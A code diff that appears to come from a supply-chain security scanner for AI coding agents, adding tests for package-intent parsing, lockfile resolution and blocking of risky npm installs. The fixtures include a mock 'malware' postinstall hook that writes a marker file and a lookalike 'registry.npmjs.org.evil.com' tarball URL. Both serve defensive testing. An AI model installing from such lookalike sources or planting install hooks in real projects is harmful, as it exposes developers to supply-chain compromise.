+        return f"pnpm add {package_name}@{fix_version}"
+    if package_manager == "yarn":
+        return f"yarn add {package_name}@{fix_version}"
+    if package_manager == "bun":
+        return f"bun add {package_name}@{fix_version}"
     return f"npm install {package_name}@{fix_version}"
 
 
+def _package_install_target(package: dict[str, object]) -> str:
+    alias = _optional_string(package.get("alias"))
+    package_name = _package_display_name({**package, "alias": None})
+    ecosystem = _optional_string(package.get("ecosystem")) or "npm"
+    if alias is not None and ecosystem == "npm":
+        return f"{alias}@npm:{package_name}"
+    return alias if alias is not None else package_name
+
+
 def _package_display_name(package: dict[str, object]) -> str:
+    alias = _optional_string(package.get("alias"))
+    if alias is not None:
+        return alias
     namespace = _optional_string(package.get("namespace"))
     name = _optional_string(package.get("name")) or "package"
     return f"{namespace}/{name}" if namespace is not None else name

--- a/tests/test_guard_js_lab_phase11.py
+++ b/tests/test_guard_js_lab_phase11.py
@@ -1,0 +1,247 @@
+"""Phase 11 offline JavaScript lab proof using a fake npm registry."""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import io
+import json
+import shlex
+import shutil
+import subprocess
+import tarfile
+import threading
+from dataclasses import dataclass
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+from pathlib import Path
+from urllib.parse import unquote, urlparse
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.package_intent import build_package_request_artifact, parse_package_intent
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+from tests.test_guard_js_supply_chain_phase11 import WORKSPACE_ID, _bundle_response, _package, _write_text
+
+
+@dataclass(frozen=True, slots=True)
+class _RegistryPackageSpec:
+    name: str
+    version: str
+    scripts: dict[str, str] | None = None
+
+
+class _FakeNpmRegistry:
+    def __init__(self, packages: tuple[_RegistryPackageSpec, ...]) -> None:
+        self._packages = {package.name: package for package in packages}
+        self._tarballs = {
+            package.name: (
+                f"/{package.name}/-/{package.name}-{package.version}.tgz",
+                _package_tarball_bytes(package),
+            )
+            for package in packages
+        }
+        self._server = ThreadingHTTPServer(("127.0.0.1", 0), _RegistryHandler)
+        self._server.registry = self  # type: ignore[attr-defined]
+        self._thread = threading.Thread(target=self._server.serve_forever, daemon=True)
+
+    @property
+    def url(self) -> str:
+        return f"http://127.0.0.1:{self._server.server_port}"
+
+    def metadata(self, package_name: str) -> dict[str, object] | None:
+        package = self._packages.get(package_name)
+        if package is None:
+            return None
+        tarball_path, tarball_bytes = self._tarballs[package.name]
+        integrity = "sha512-" + base64.b64encode(hashlib.sha512(tarball_bytes).digest()).decode("utf-8")
+        return {
+            "name": package.name,
+            "dist-tags": {"latest": package.version},
+            "versions": {
+                package.version: {
+                    "name": package.name,
+                    "version": package.version,
+                    "dist": {"tarball": f"{self.url}{tarball_path}", "integrity": integrity},
+                }
+            },
+        }
+
+    def tarball(self, request_path: str) -> bytes | None:
+        for tarball_path, tarball_bytes in self._tarballs.values():
+            if request_path == tarball_path:
+                return tarball_bytes
+        return None
+
+    def __enter__(self) -> _FakeNpmRegistry:
+        self._thread.start()
+        return self
+
+    def __exit__(self, exc_type: object, exc: object, tb: object) -> None:
+        self._server.shutdown()
+        self._thread.join(timeout=5)
+        self._server.server_close()
+
+
+class _RegistryHandler(BaseHTTPRequestHandler):
+    def do_GET(self) -> None:
+        registry = self.server.registry  # type: ignore[attr-defined]
+        request_path = unquote(urlparse(self.path).path)
+        package_name = request_path.lstrip("/")
+        metadata = registry.metadata(package_name)
+        if metadata is not None:
+            body = json.dumps(metadata).encode("utf-8")
+            self.send_response(200)
+            self.send_header("Content-Type", "application/json")
+            self.send_header("Content-Length", str(len(body)))
+            self.end_headers()
+            self.wfile.write(body)
+            return
+        tarball = registry.tarball(request_path)
+        if tarball is not None:
+            self.send_response(200)
+            self.send_header("Content-Type", "application/octet-stream")
+            self.send_header("Content-Length", str(len(tarball)))
+            self.end_headers()
+            self.wfile.write(tarball)
+            return
+        self.send_response(404)
+        self.end_headers()
+
+    def log_message(self, message_format: str, *args: object) -> None:
+        return None
+
+
+def _package_tarball_bytes(package: _RegistryPackageSpec) -> bytes:
+    buffer = io.BytesIO()
+    with tarfile.open(fileobj=buffer, mode="w:gz") as archive:
+        package_json = {
+            "name": package.name,
+            "version": package.version,
+            "main": "index.js",
+        }
+        if package.scripts is not None:
+            package_json["scripts"] = package.scripts
+        package_payload = json.dumps(package_json).encode("utf-8")
+        package_info = tarfile.TarInfo("package/package.json")
+        package_info.size = len(package_payload)
+        archive.addfile(package_info, io.BytesIO(package_payload))
+        index_payload = b"module.exports = 'lab';\n"
+        index_info = tarfile.TarInfo("package/index.js")
+        index_info.size = len(index_payload)
+        archive.addfile(index_info, io.BytesIO(index_payload))
+    return buffer.getvalue()
+
+
+def _install_command(package_name: str, registry_url: str) -> list[str]:
+    return [
+        "npm",
+        "install",
+        "--ignore-scripts",
+        "--no-audit",
+        "--fund=false",
+        f"--registry={registry_url}",
+        f"{package_name}@1.0.0",
+    ]
+
+
+def _run_offline_registry_install(workspace_dir: Path, package_name: str, registry_url: str) -> str:
+    workspace_dir.mkdir(parents=True, exist_ok=True)
+    _write_text(workspace_dir / "package.json", '{"name":"guard-js-lab","private":true}\n')
+    command = _install_command(package_name, registry_url)
+    completed = subprocess.run(
+        command,
+        cwd=workspace_dir,
+        capture_output=True,
+        text=True,
+        check=False,
+        timeout=60,
+    )
+    assert completed.returncode == 0, completed.stderr
+    return shlex.join(command)
+
+
+def _evaluate_offline_registry_install(
+    *,
+    store: GuardStore,
+    workspace_dir: Path,
+    package_name: str,
+    registry_url: str,
+) -> object:
+    command = _run_offline_registry_install(workspace_dir, package_name, registry_url)
+    intent = parse_package_intent(command, workspace=workspace_dir)
+    assert intent is not None
+    artifact = build_package_request_artifact("codex", intent, config_path="codex.json", source_scope="project")
+    return evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+
+@pytest.mark.skipif(shutil.which("npm") is None, reason="npm required for offline JS lab proof")
+def test_guard_js_offline_fake_registry_lab_covers_safe_vulnerable_and_malware_packages(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[
+                _package(
+                    name="vulnerable-demo",
+                    version="1.0.0",
+                    default_action="block",
+                    recommended_fix_version="1.0.1",
+                ),
+                _package(
+                    name="malware-demo",
+                    version="1.0.0",
+                    default_action="block",
+                    recommended_fix_version="1.0.1",
+                ),
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+    packages = (
+        _RegistryPackageSpec(name="safe-demo", version="1.0.0"),
+        _RegistryPackageSpec(name="vulnerable-demo", version="1.0.0"),
+        _RegistryPackageSpec(
+            name="malware-demo",
+            version="1.0.0",
+            scripts={
+                "postinstall": (
+                    "node -e \"require('fs').writeFileSync("
+                    "require('path').join(process.env.INIT_CWD || process.cwd(), 'malware-marker.txt'),'x')\""
+                )
+            },
+        ),
+    )
+
+    with _FakeNpmRegistry(packages) as registry:
+        safe_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=tmp_path / "safe-workspace",
+            package_name="safe-demo",
+            registry_url=registry.url,
+        )
+        vulnerable_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=tmp_path / "vulnerable-workspace",
+            package_name="vulnerable-demo",
+            registry_url=registry.url,
+        )
+        malware_workspace = tmp_path / "malware-workspace"
+        malware_result = _evaluate_offline_registry_install(
+            store=store,
+            workspace_dir=malware_workspace,
+            package_name="malware-demo",
+            registry_url=registry.url,
+        )
+
+    assert safe_result.decision == "monitor"
+    assert vulnerable_result.decision == "block"
+    assert vulnerable_result.packages[0]["name"] == "vulnerable-demo"
+    assert malware_result.decision == "block"
+    assert malware_result.packages[0]["name"] == "malware-demo"
+    assert not (malware_workspace / "malware-marker.txt").exists()

--- a/tests/test_guard_js_lockfile_resolution_phase11.py
+++ b/tests/test_guard_js_lockfile_resolution_phase11.py
@@ -1,0 +1,85 @@
+"""Phase 11 lockfile resolution regressions for JavaScript package evaluation."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+from tests.test_guard_js_supply_chain_phase11 import (
+    WORKSPACE_ID,
+    _artifact_from_command,
+    _bundle_response,
+    _package,
+    _write_text,
+)
+
+
+def test_evaluate_package_request_artifact_preserves_direct_version_when_package_lock_contains_nested_duplicate(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(
+        workspace_dir / "package.json",
+        '{"name":"demo","dependencies":{"minimist":"^1.2.0","react":"17.0.0"}}\n',
+    )
+    _write_text(
+        workspace_dir / "package-lock.json",
+        (
+            '{"dependencies":{"minimist":{"version":"1.2.9"},"react":{"version":"17.0.0",'
+            '"dependencies":{"minimist":{"version":"1.2.8"}}}}}\n'
+        ),
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install minimist@^1.2.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["dependencyPath"] == "react/node_modules/minimist"
+    assert any(
+        package["resolvedVersion"] == "1.2.9" and package["decision"] == "allow"
+        for package in result.packages
+    )
+
+
+def test_evaluate_package_request_artifact_resolves_alias_range_from_package_lock_metadata(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo","dependencies":{"guard-safe":"npm:minimist@^1.2.0"}}\n')
+    _write_text(
+        workspace_dir / "package-lock.json",
+        (
+            '{"lockfileVersion":3,"packages":{"":{"dependencies":{"guard-safe":"npm:minimist@^1.2.0"}},'
+            '"node_modules/guard-safe":{"name":"minimist","version":"1.2.8"}}}\n'
+        ),
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(packages=[_package(name="minimist", version="1.2.8", default_action="block")]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install guard-safe@npm:minimist@^1.2.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "1.2.8"
+    assert result.user_copy.next_step == "npm install guard-safe@npm:minimist@1.2.9"

--- a/tests/test_guard_js_lockfile_resolution_phase11.py
+++ b/tests/test_guard_js_lockfile_resolution_phase11.py
@@ -48,10 +48,7 @@ def test_evaluate_package_request_artifact_preserves_direct_version_when_package
 
     assert result.decision == "block"
     assert result.packages[0]["dependencyPath"] == "react/node_modules/minimist"
-    assert any(
-        package["resolvedVersion"] == "1.2.9" and package["decision"] == "allow"
-        for package in result.packages
-    )
+    assert any(package["resolvedVersion"] == "1.2.9" and package["decision"] == "allow" for package in result.packages)
 
 
 def test_evaluate_package_request_artifact_resolves_alias_range_from_package_lock_metadata(

--- a/tests/test_guard_js_package_hook_phase11.py
+++ b/tests/test_guard_js_package_hook_phase11.py
@@ -1,0 +1,212 @@
+"""Phase 11 JavaScript package-hook proofs for exec flows."""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import json
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import padding
+from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
+
+from codex_plugin_scanner.cli import main
+from codex_plugin_scanner.guard.cli import commands as guard_commands_module
+from codex_plugin_scanner.guard.store import GuardStore
+
+WORKSPACE_ID = "workspace-alpha"
+
+
+def _iso(value: datetime) -> str:
+    return value.astimezone(timezone.utc).isoformat().replace("+00:00", "Z")
+
+
+def _generate_key_pair() -> tuple[bytes, bytes]:
+    private_key = generate_private_key(public_exponent=65537, key_size=2048)
+    private_pem = private_key.private_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PrivateFormat.PKCS8,
+        encryption_algorithm=serialization.NoEncryption(),
+    )
+    public_pem = private_key.public_key().public_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PublicFormat.SubjectPublicKeyInfo,
+    )
+    return private_pem, public_pem
+
+
+def _fingerprint(public_key_pem: bytes) -> str:
+    return hashlib.sha256(public_key_pem.decode("utf-8").strip().encode("utf-8")).hexdigest()
+
+
+def _bundle_response(*, package_name: str, version: str, namespace: str | None = None) -> dict[str, object]:
+    generated_at = datetime(2026, 5, 19, tzinfo=timezone.utc)
+    expires_at = generated_at + timedelta(hours=12)
+    purl_name = f"{namespace}/{package_name}" if namespace is not None else package_name
+    bundle = {
+        "advisories": [
+            {
+                "advisoryId": "GHSA-vh95-rmgr-6w4m",
+                "aliases": ["CVE-2020-7598"],
+                "confidence": 990,
+                "exploitLevel": "active",
+                "knownExploited": True,
+                "malwareState": "known",
+                "normalizedSeverity": "critical",
+                "recommendedFixVersion": None,
+                "sourceKey": "ghsa",
+                "summary": "Remote execution package risk",
+                "title": "Remote execution package risk",
+            }
+        ],
+        "bundleVersion": "1747612800000-deadbeef",
+        "expiresAt": _iso(expires_at),
+        "feedSnapshotHash": "feed-snapshot-1",
+        "generatedAt": _iso(generated_at),
+        "keyId": "guard-bundle-key-2026-05",
+        "packages": [
+            {
+                "confidence": 990,
+                "defaultAction": "block",
+                "ecosystem": "npm",
+                "exploitLevel": "active",
+                "knownExploited": True,
+                "malwareState": "known",
+                "name": package_name,
+                "namespace": namespace,
+                "normalizedSeverity": "critical",
+                "packageAgeState": "watch",
+                "purl": f"pkg:npm/{purl_name}@{version}",
+                "reachability": "reachable",
+                "recommendedFixVersion": None,
+                "relatedAdvisoryIds": ["GHSA-vh95-rmgr-6w4m"],
+                "riskScore": 980,
+                "sourceIntegrityState": "high-risk",
+                "version": version,
+            }
+        ],
+        "policyHash": "policy-hash-1",
+        "policyRules": [],
+        "scoringVersion": "scf-v1",
+        "sourceHashes": [{"payloadHash": "ghsa-feed-hash", "sourceKey": "ghsa", "staleStatus": "fresh"}],
+        "tier": "premium",
+        "workspaceId": WORKSPACE_ID,
+    }
+    private_key_pem, public_key_pem = _generate_key_pair()
+    loaded_key = serialization.load_pem_private_key(private_key_pem, password=None)
+    assert isinstance(loaded_key, RSAPrivateKey)
+    canonical_payload = json.dumps(bundle, sort_keys=True, separators=(",", ":")).encode("utf-8")
+    payload_hash = hashlib.sha256(canonical_payload).hexdigest()
+    signature = loaded_key.sign(
+        canonical_payload,
+        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
+        hashes.SHA256(),
+    )
+    return {
+        "bundle": bundle,
+        "payloadHash": payload_hash,
+        "signature": base64.b64encode(signature).decode("utf-8"),
+        "signatureAlgorithm": "rsa-pss-sha256",
+        "verificationKeys": [
+            {
+                "fingerprintSha256": _fingerprint(public_key_pem),
+                "keyId": "guard-bundle-key-2026-05",
+                "publicKeyPem": public_key_pem.decode("utf-8").strip(),
+                "state": "active",
+                "validUntil": None,
+            }
+        ],
+    }
+
+
+def _write_codex_pre_tool_payload(path: Path, workspace_dir: Path, command: str) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(
+        json.dumps(
+            {
+                "session_id": "session-1",
+                "turn_id": "turn-1",
+                "cwd": str(workspace_dir),
+                "hook_event_name": "PreToolUse",
+                "model": "gpt-5.4",
+                "permission_mode": "bypassPermissions",
+                "tool_name": "Bash",
+                "tool_input": {"command": command},
+                "tool_use_id": "call-1",
+            }
+        ),
+        encoding="utf-8",
+    )
+
+
+@pytest.mark.parametrize(
+    ("command", "package_name", "version", "namespace"),
+    [
+        ("npx create-vite@5.1.0", "create-vite", "5.1.0", None),
+        ("npm exec --package=create-vite@5.1.0 create-vite", "create-vite", "5.1.0", None),
+        ("pnpm dlx create-next-app@14.2.0", "create-next-app", "14.2.0", None),
+        ("yarn dlx @redwoodjs/create-redwood-app@6.0.0", "create-redwood-app", "6.0.0", "@redwoodjs"),
+        ("bunx @angular/cli@19.0.0", "cli", "19.0.0", "@angular"),
+    ],
+)
+def test_guard_hook_blocks_js_exec_flows_before_subprocess(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    capsys: pytest.CaptureFixture[str],
+    command: str,
+    package_name: str,
+    version: str,
+    namespace: str | None,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    payload_path = workspace_dir / "hook-event.json"
+    _write_codex_pre_tool_payload(payload_path, workspace_dir, command)
+    store = GuardStore(home_dir)
+    store.set_sync_credentials(
+        "https://hol.org/api/guard/receipts/sync", "demo-token", "2026-05-19T00:00:00Z", workspace_id=WORKSPACE_ID
+    )
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(package_name=package_name, version=version, namespace=namespace),
+        "2026-05-19T00:00:00Z",
+    )
+    (home_dir / "config.toml").write_text("approval_wait_timeout_seconds = 0\n", encoding="utf-8")
+    monkeypatch.setenv("CODEX_MANAGED_BY_BUN", "1")
+    monkeypatch.setattr(guard_commands_module, "ensure_guard_daemon", lambda _home: "http://127.0.0.1:5474")
+
+    def fail_daemon(_home: Path) -> object:
+        raise RuntimeError("no daemon client")
+
+    monkeypatch.setattr(guard_commands_module, "load_guard_surface_daemon_client", fail_daemon)
+
+    def fail_subprocess(*args: object, **kwargs: object) -> object:
+        raise AssertionError("blocked exec flow must not launch a subprocess")
+
+    monkeypatch.setattr(guard_commands_module.subprocess, "run", fail_subprocess)
+
+    rc = main(
+        [
+            "guard",
+            "hook",
+            "--harness",
+            "codex",
+            "--home",
+            str(home_dir),
+            "--workspace",
+            str(workspace_dir),
+            "--event-file",
+            str(payload_path),
+        ]
+    )
+    captured = capsys.readouterr()
+
+    assert rc == 2
+    assert "blocked" in captured.err.lower()
+    evidence = store.list_evidence()
+    assert evidence
+    assert evidence[0]["category"] == "supply-chain"

--- a/tests/test_guard_js_package_intent_phase11.py
+++ b/tests/test_guard_js_package_intent_phase11.py
@@ -58,12 +58,10 @@ def test_parse_package_intent_npm_exec_keeps_explicit_version_when_positional_to
 
 def test_parse_manifest_dependency_changes_supports_package_lock_v1_nested_dependencies() -> None:
     before_text = (
-        '{"dependencies":{"minimist":{"version":"1.2.7","dependencies":'
-        '{"brace-expansion":{"version":"1.1.11"}}}}}'
+        '{"dependencies":{"minimist":{"version":"1.2.7","dependencies":{"brace-expansion":{"version":"1.1.11"}}}}}'
     )
     after_text = (
-        '{"dependencies":{"minimist":{"version":"1.2.8","dependencies":'
-        '{"brace-expansion":{"version":"1.1.12"}}}}}'
+        '{"dependencies":{"minimist":{"version":"1.2.8","dependencies":{"brace-expansion":{"version":"1.1.12"}}}}}'
     )
 
     result = parse_manifest_dependency_changes(

--- a/tests/test_guard_js_package_intent_phase11.py
+++ b/tests/test_guard_js_package_intent_phase11.py
@@ -1,0 +1,213 @@
+"""Phase 11 JavaScript package intent and lockfile parsing tests."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+from codex_plugin_scanner.guard.runtime.package_intent import (
+    parse_manifest_dependency_changes,
+    parse_package_intent,
+)
+
+
+def _write_text(path: Path, text: str) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(text, encoding="utf-8")
+
+
+def test_parse_package_intent_npm_audit_fix_uses_manifest_and_lockfile_context(tmp_path: Path) -> None:
+    _write_text(tmp_path / "package.json", '{"name":"demo"}\n')
+    _write_text(tmp_path / "package-lock.json", '{"lockfileVersion":3}\n')
+
+    intent = parse_package_intent("npm audit fix --package-lock-only", workspace=tmp_path)
+
+    assert intent is not None
+    assert intent.package_manager == "npm"
+    assert intent.intent_kind == "sync"
+    assert intent.targets == ()
+    assert intent.manifest_paths == ("package.json",)
+    assert intent.lockfile_paths == ("package-lock.json",)
+    assert "--package-lock-only" in intent.flags
+
+
+def test_parse_package_intent_js_named_source_specs_capture_source_urls() -> None:
+    intent = parse_package_intent(
+        "npm install guard-github@github:hashgraph-online/hol-guard "
+        "guard-http@http://example.com/guard.tgz "
+        "guard-https@https://example.com/guard.tgz"
+    )
+
+    assert intent is not None
+    assert [target.package_name for target in intent.targets] == ["guard-github", "guard-http", "guard-https"]
+    assert [target.source_url for target in intent.targets] == [
+        "github:hashgraph-online/hol-guard",
+        "http://example.com/guard.tgz",
+        "https://example.com/guard.tgz",
+    ]
+
+
+def test_parse_package_intent_npm_exec_keeps_explicit_version_when_positional_token_is_bare() -> None:
+    intent = parse_package_intent("npm exec --package=create-vite@5.1.0 create-vite")
+
+    assert intent is not None
+    assert intent.package_manager == "npm"
+    assert intent.intent_kind == "execute"
+    assert intent.targets[0].package_name == "create-vite"
+    assert intent.targets[0].requested_specifier == "5.1.0"
+
+
+def test_parse_manifest_dependency_changes_supports_package_lock_v1_nested_dependencies() -> None:
+    before_text = (
+        '{"dependencies":{"minimist":{"version":"1.2.7","dependencies":'
+        '{"brace-expansion":{"version":"1.1.11"}}}}}'
+    )
+    after_text = (
+        '{"dependencies":{"minimist":{"version":"1.2.8","dependencies":'
+        '{"brace-expansion":{"version":"1.1.12"}}}}}'
+    )
+
+    result = parse_manifest_dependency_changes(
+        path="package-lock.json",
+        before_text=before_text,
+        after_text=after_text,
+    )
+
+    actual = {change.package_name: (change.before, change.after) for change in result.changes}
+    assert result.parse_errors == ()
+    assert actual == {
+        "brace-expansion": ("1.1.11", "1.1.12"),
+        "minimist": ("1.2.7", "1.2.8"),
+    }
+
+
+def test_parse_manifest_dependency_changes_supports_pnpm_lock_snapshots() -> None:
+    before_text = """
+lockfileVersion: '9.0'
+packages:
+  minimist@1.2.7:
+    resolution: {integrity: sha512-old}
+  brace-expansion@1.1.11:
+    resolution: {integrity: sha512-old}
+snapshots:
+  minimist@1.2.7:
+    dependencies:
+      brace-expansion: 1.1.11
+"""
+    after_text = """
+lockfileVersion: '9.0'
+packages:
+  minimist@1.2.8:
+    resolution: {integrity: sha512-new}
+  brace-expansion@1.1.12:
+    resolution: {integrity: sha512-new}
+snapshots:
+  minimist@1.2.8:
+    dependencies:
+      brace-expansion: 1.1.12
+"""
+
+    result = parse_manifest_dependency_changes(
+        path="pnpm-lock.yaml",
+        before_text=before_text,
+        after_text=after_text,
+    )
+
+    actual = {change.package_name: (change.before, change.after) for change in result.changes}
+    assert result.parse_errors == ()
+    assert actual == {
+        "brace-expansion": ("1.1.11", "1.1.12"),
+        "minimist": ("1.2.7", "1.2.8"),
+    }
+
+
+def test_parse_manifest_dependency_changes_supports_yarn_classic_and_berry_entries() -> None:
+    classic_before = '"minimist@^1.2.7":\n  version "1.2.7"\n'
+    classic_after = '"minimist@^1.2.8":\n  version "1.2.8"\n"brace-expansion@^1.1.12":\n  version "1.1.12"\n'
+    classic_result = parse_manifest_dependency_changes(
+        path="yarn.lock",
+        before_text=classic_before,
+        after_text=classic_after,
+    )
+    classic_actual = {change.package_name: (change.before, change.after) for change in classic_result.changes}
+
+    berry_before = """
+__metadata:
+  version: 4
+  cacheKey: 8
+
+"minimist@npm:^1.2.7":
+  version: 1.2.7
+  resolution: "minimist@npm:1.2.7"
+"""
+    berry_after = """
+__metadata:
+  version: 4
+  cacheKey: 8
+
+"minimist@npm:^1.2.8":
+  version: 1.2.8
+  resolution: "minimist@npm:1.2.8"
+
+"brace-expansion@npm:^1.1.12":
+  version: 1.1.12
+  resolution: "brace-expansion@npm:1.1.12"
+"""
+    berry_result = parse_manifest_dependency_changes(
+        path="yarn.lock",
+        before_text=berry_before,
+        after_text=berry_after,
+    )
+    berry_actual = {change.package_name: (change.before, change.after) for change in berry_result.changes}
+
+    assert classic_result.parse_errors == ()
+    assert classic_actual == {
+        "brace-expansion": (None, "1.1.12"),
+        "minimist": ("1.2.7", "1.2.8"),
+    }
+    assert berry_result.parse_errors == ()
+    assert berry_actual == {
+        "brace-expansion": (None, "1.1.12"),
+        "minimist": ("1.2.7", "1.2.8"),
+    }
+
+
+def test_parse_manifest_dependency_changes_supports_bun_text_lock() -> None:
+    before_text = """
+[[package]]
+name = "minimist"
+version = "1.2.7"
+resolved = "npm:minimist@1.2.7"
+dependencies = [{ name = "brace-expansion", version = "^1.1.11" }]
+
+[[package]]
+name = "brace-expansion"
+version = "1.1.11"
+resolved = "npm:brace-expansion@1.1.11"
+dependencies = []
+"""
+    after_text = """
+[[package]]
+name = "minimist"
+version = "1.2.8"
+resolved = "npm:minimist@1.2.8"
+dependencies = [{ name = "brace-expansion", version = "^1.1.12" }]
+
+[[package]]
+name = "brace-expansion"
+version = "1.1.12"
+resolved = "npm:brace-expansion@1.1.12"
+dependencies = []
+"""
+
+    result = parse_manifest_dependency_changes(
+        path="bun.lock",
+        before_text=before_text,
+        after_text=after_text,
+    )
+
+    actual = {change.package_name: (change.before, change.after) for change in result.changes}
+    assert result.parse_errors == ()
+    assert actual == {
+        "brace-expansion": ("1.1.11", "1.1.12"),
+        "minimist": ("1.2.7", "1.2.8"),
+    }

--- a/tests/test_guard_js_package_intent_phase11.py
+++ b/tests/test_guard_js_package_intent_phase11.py
@@ -169,6 +169,17 @@ __metadata:
     }
 
 
+def test_parse_manifest_dependency_changes_ignores_yarn_berry_metadata_sections() -> None:
+    result = parse_manifest_dependency_changes(
+        path="yarn.lock",
+        before_text='__metadata:\n  version: 4\n  cacheKey: 8\n',
+        after_text='__metadata:\n  version: 5\n  cacheKey: 9\n',
+    )
+
+    assert result.parse_errors == ()
+    assert result.changes == ()
+
+
 def test_parse_manifest_dependency_changes_supports_bun_text_lock() -> None:
     before_text = """
 [[package]]

--- a/tests/test_guard_js_package_intent_phase11.py
+++ b/tests/test_guard_js_package_intent_phase11.py
@@ -46,6 +46,14 @@ def test_parse_package_intent_js_named_source_specs_capture_source_urls() -> Non
     ]
 
 
+def test_parse_package_intent_js_file_source_specs_capture_local_sources() -> None:
+    intent = parse_package_intent("npm install guard-local@file:../fixtures/guard-local")
+
+    assert intent is not None
+    assert intent.targets[0].package_name == "guard-local"
+    assert intent.targets[0].source_url == "file:../fixtures/guard-local"
+
+
 def test_parse_package_intent_npm_exec_keeps_explicit_version_when_positional_token_is_bare() -> None:
     intent = parse_package_intent("npm exec --package=create-vite@5.1.0 create-vite")
 

--- a/tests/test_guard_js_semver_phase11.py
+++ b/tests/test_guard_js_semver_phase11.py
@@ -1,0 +1,19 @@
+"""Phase 11 JavaScript semver regression tests."""
+
+from __future__ import annotations
+
+from codex_plugin_scanner.guard.runtime.js_semver import version_matches_js_selector
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import _exact_version
+
+
+def test_version_matches_js_selector_preserves_prerelease_ordering() -> None:
+    assert version_matches_js_selector("1.2.3-beta.1", "1.2.3-beta.1")
+    assert not version_matches_js_selector("1.2.3-beta.1", "1.2.3")
+    assert not version_matches_js_selector("1.2.3-beta.1", ">=1.2.3")
+    assert version_matches_js_selector("1.2.3", ">=1.2.3")
+
+
+def test_exact_version_ignores_all_js_source_prefixes() -> None:
+    assert _exact_version("github:hashgraph-online/hol-guard") is None
+    assert _exact_version("gitlab:hashgraph-online/hol-guard") is None
+    assert _exact_version("bitbucket:hashgraph-online/hol-guard") is None

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -240,6 +240,11 @@ def test_evaluate_package_request_artifact_uses_manager_specific_fix_command(
         ("npm install guard-http@http://example.com/guard.tgz", "block", "insecure_source_url"),
         ("npm install guard-https@https://example.com/guard.tgz", "warn", "external_tarball_source"),
         ("npm install guard-query@https://example.com/guard.tgz?token=demo", "warn", "external_tarball_source"),
+        (
+            "npm install guard-lookalike@https://registry.npmjs.org.evil.com/guard.tgz",
+            "warn",
+            "external_tarball_source",
+        ),
     ],
 )
 def test_evaluate_package_request_artifact_applies_js_source_heuristics(
@@ -295,6 +300,20 @@ importers:
         version: 1.2.8
 packages:
   minimist@1.2.8:
+    resolution: {integrity: sha512-demo}
+""",
+        ),
+        (
+            "pnpm add minimist@^1.2.0",
+            "pnpm-lock.yaml",
+            """
+lockfileVersion: 5.4
+specifiers:
+  minimist: ^1.2.0
+dependencies:
+  minimist: 1.2.8
+packages:
+  /minimist/1.2.8:
     resolution: {integrity: sha512-demo}
 """,
         ),

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -279,6 +279,77 @@ def test_evaluate_package_request_artifact_uses_source_specific_risk_summary_for
     assert "external tarball source" in result.risk_summary.lower()
 
 
+@pytest.mark.parametrize(
+    ("command", "lockfile_name", "lockfile_text"),
+    [
+        (
+            "pnpm add minimist@^1.2.0",
+            "pnpm-lock.yaml",
+            """
+lockfileVersion: '9.0'
+importers:
+  .:
+    dependencies:
+      minimist:
+        specifier: ^1.2.0
